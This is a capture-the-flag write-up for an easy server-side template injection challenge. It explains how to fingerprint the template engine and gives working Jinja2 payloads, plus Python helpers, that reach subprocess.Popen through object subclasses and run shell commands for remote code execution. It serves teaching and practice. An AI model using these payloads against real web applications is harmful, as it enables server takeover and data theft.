Super Secure Technology Infrastructure

Authored challenge, NYP InfoSec December CTF 2022

Last updated 2 years ago


Difficulty: Easy
Points: 146
Solves: 9

Description

Super secure technology infrastructure, A fortress built with digital flair, Encrypted and protected, no intrusion allowed, Our data safe from any dare. Poem by ChatGPT

The initials of the challenge title spell SSTI, a strong hint that the vulnerability is Server Side Template Injection.

Server-side template injection (SSTI) occurs when a web application concatenates user input into a template string and then renders it, instead of passing the input to a fixed template as data. If the input is not properly sanitized, an attacker can inject template syntax, which the engine evaluates on the server when the template is rendered. In most engines that evaluation reaches the host language, so SSTI commonly escalates to remote code execution.

First, we need to identify the templating engine. The standard approach is the decision tree of arithmetic probe payloads ({{7*7}}, ${7*7}, {{7*'7'}} and so on) in the HackTricks guide linked under References: which probes get evaluated, and what they evaluate to, narrows the engine down.
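That decision tree as code, added here as an example and not part of the original writeup. The probe set and the behaviours it checks (Python string repetition in Jinja2, numeric coercion in Twig, comment stripping in Smarty) come from the public SSTI guides; the response dictionaries are constructed sample data standing in for what a server echoed back for each probe.

```python
# Added example (not from the original writeup): an offline, simplified version of the
# SSTI fingerprinting decision tree from the HackTricks / PayloadsAllTheThings guides.
# `responses` maps each probe payload to the text the server echoed back for it.
from typing import Dict

PROBES = ["${7*7}", "{{7*7}}", "{{7*'7'}}", "a{*comment*}b", "<%= 7*7 %>"]


def identify_engine(responses: Dict[str, str]) -> str:
    """Classify the template engine from how the arithmetic probes were evaluated.

    Simplified behaviour per engine:
      Smarty : ${7*7} -> 49 and {*comment*} is stripped
      Mako   : ${7*7} -> 49, Smarty comment syntax is echoed back unchanged
      Jinja2 : {{7*7}} -> 49 and {{7*'7'}} -> 7777777 (Python string repetition;
               Tornado, also Python, behaves the same, hence the shared label)
      Twig   : {{7*7}} -> 49 and {{7*'7'}} -> 49 (PHP numeric coercion)
      ERB    : <%= 7*7 %> -> 49
    In practice use a product that cannot occur in the page by accident
    (e.g. 1337*7) instead of 7*7 so a stray "49" cannot cause a false positive.
    """

    def evaluated(probe: str, expected: str) -> bool:
        # The probe counts as evaluated only if the result is present and the raw
        # probe text is gone (an engine that does not parse it echoes it verbatim).
        r = responses.get(probe)
        return r is not None and expected in r and probe not in r

    if evaluated("${7*7}", "49"):
        comment = responses.get("a{*comment*}b", "")
        return "Smarty" if ("ab" in comment and "{*" not in comment) else "Mako"
    if evaluated("{{7*7}}", "49"):
        if evaluated("{{7*'7'}}", "7777777"):
            return "Jinja2/Tornado"
        if evaluated("{{7*'7'}}", "49"):
            return "Twig"
        return "unknown (mustache-style syntax)"
    if evaluated("<%= 7*7 %>", "49"):
        return "ERB"
    return "not vulnerable / unknown"


# Constructed sample responses: what a vulnerable page might echo back per probe.
SAMPLE_JINJA2 = {"${7*7}": "Hello ${7*7}", "{{7*7}}": "Hello 49", "{{7*'7'}}": "Hello 7777777"}
SAMPLE_TWIG = {"${7*7}": "Hello ${7*7}", "{{7*7}}": "Hello 49", "{{7*'7'}}": "Hello 49"}
SAMPLE_SMARTY = {"${7*7}": "Hello 49", "a{*comment*}b": "Hello ab"}
SAMPLE_MAKO = {"${7*7}": "Hello 49", "a{*comment*}b": "Hello a{*comment*}b"}
SAMPLE_NOT_VULNERABLE = {p: "Hello " + p for p in PROBES}  # everything echoed verbatim

if __name__ == "__main__":
    for name, sample in [("jinja2", SAMPLE_JINJA2), ("twig", SAMPLE_TWIG),
                         ("smarty", SAMPLE_SMARTY), ("mako", SAMPLE_MAKO),
                         ("safe", SAMPLE_NOT_VULNERABLE)]:
        print(f"{name:>7}: {identify_engine(sample)}")
```

On the challenge the {{7*'7'}} probe returning 7777777 is what separates Jinja2 from Twig, which uses the same {{ }} syntax.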

Once we know it is Jinja2, we need the index of <class 'subprocess.Popen'> in the list of subclasses of object. ''.__class__ is str, its __mro__[1] is object, and __subclasses__() returns every class currently loaded in the interpreter, so the payload below dumps that whole list:

{{''.__class__.__mro__[1].__subclasses__()}}

A handy script to find the offset: paste the list returned by the server into data and it prints a ready-to-send payload for every candidate index.

# Paste the list returned by the {{''.__class__.__mro__[1].__subclasses__()}} probe here
data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
data = data.split(', ')

# Collect the index of every entry that mentions subprocess (normally only subprocess.Popen)
indices = []
for i, d in enumerate(data):
    if 'subprocess' in d:
        print("Found in index:", i)
        indices.append(i)

# One payload per candidate index; the {{{{ and }}}} are doubled braces inside the f-string
for i in indices:
    print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")

After finding <class 'subprocess.Popen'> we can use it to perform RCE. On the challenge target it sat at index 397; this offset depends on the Python version and on which modules the application has loaded, so it has to be rediscovered per target. stdout=-1 is subprocess.PIPE, and communicate() returns a (stdout, stderr) tuple, so the command output is rendered straight into the page:

{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}
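The gadget chain from the payload above, reproduced in plain Python as an added example (not code from the original writeup). It needs no Jinja2: it walks the same ''.__class__.__mro__[1].__subclasses__() path in the local interpreter to show where the index comes from and why 397 is specific to the challenge's environment. The index-free template at the end is assumed to be rendered by Jinja2 with its default, unsandboxed Environment.

```python
# Added example (not from the original writeup): each step of
#   ''.__class__.__mro__[1].__subclasses__()[N]('cmd', shell=True, stdout=-1).communicate()
# executed as ordinary Python, plus payload builders for the index the *local*
# interpreter happens to have.
import subprocess  # Popen only appears in object.__subclasses__() once subprocess has been
                   # imported somewhere; on a real target a dependency has usually done so.


def find_popen_index() -> int:
    """Index of subprocess.Popen in object.__subclasses__(), the list the payload walks.

    ''.__class__ is <class 'str'>, its __mro__[1] is <class 'object'>, and
    object.__subclasses__() lists every loaded class in load order. That order
    differs between Python versions and applications, so the offset is per target.
    """
    base = ''.__class__.__mro__[1]
    for i, cls in enumerate(base.__subclasses__()):
        if cls.__name__ == 'Popen' and cls.__module__ == 'subprocess':
            return i
    raise LookupError("subprocess.Popen is not loaded in this interpreter")


def run_via_gadget(cmd: str) -> bytes:
    """Run `cmd` exactly the way the SSTI payload does (stdout=-1 is subprocess.PIPE)."""
    popen = ''.__class__.__mro__[1].__subclasses__()[find_popen_index()]
    out, _err = popen(cmd, shell=True, stdout=-1).communicate()
    return out


def jinja2_payload(cmd: str) -> str:
    """The hard-coded-index payload from the writeup, with the index valid for this interpreter."""
    return ("{{''.__class__.__mro__[1].__subclasses__()[%d]('%s',shell=True,stdout=-1).communicate()}}"
            % (find_popen_index(), cmd))


def jinja2_payload_no_index(cmd: str) -> str:
    """Index-independent variant: loop over the subclasses inside the template and pick
    Popen by name, so one payload works regardless of the target's class load order."""
    return ("{% for c in ''.__class__.__mro__[1].__subclasses__() %}"
            "{% if c.__name__ == 'Popen' %}"
            "{{ c('" + cmd + "',shell=True,stdout=-1).communicate() }}"
            "{% endif %}{% endfor %}")


if __name__ == "__main__":
    print("Popen index in this interpreter:", find_popen_index())
    print(run_via_gadget("echo gadget-chain-works"))
    print(jinja2_payload("cat flag.txt"))
    print(jinja2_payload_no_index("cat flag.txt"))
```

Running it under two different Python versions prints two different indices, which is the practical reason to prefer the name-based loop over a hard-coded offset when the target environment is unknown.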

After playing with the input, we can identify that it is running Jinja2. We can also refer to the guide to identify the templating engine.

Referring to the guide, we are able to perform remote code execution and get the flag!

References

HackTricks, SSTI (Server Side Template Injection): https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
PayloadsAllTheThings, Server Side Template Injection (Jinja2): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2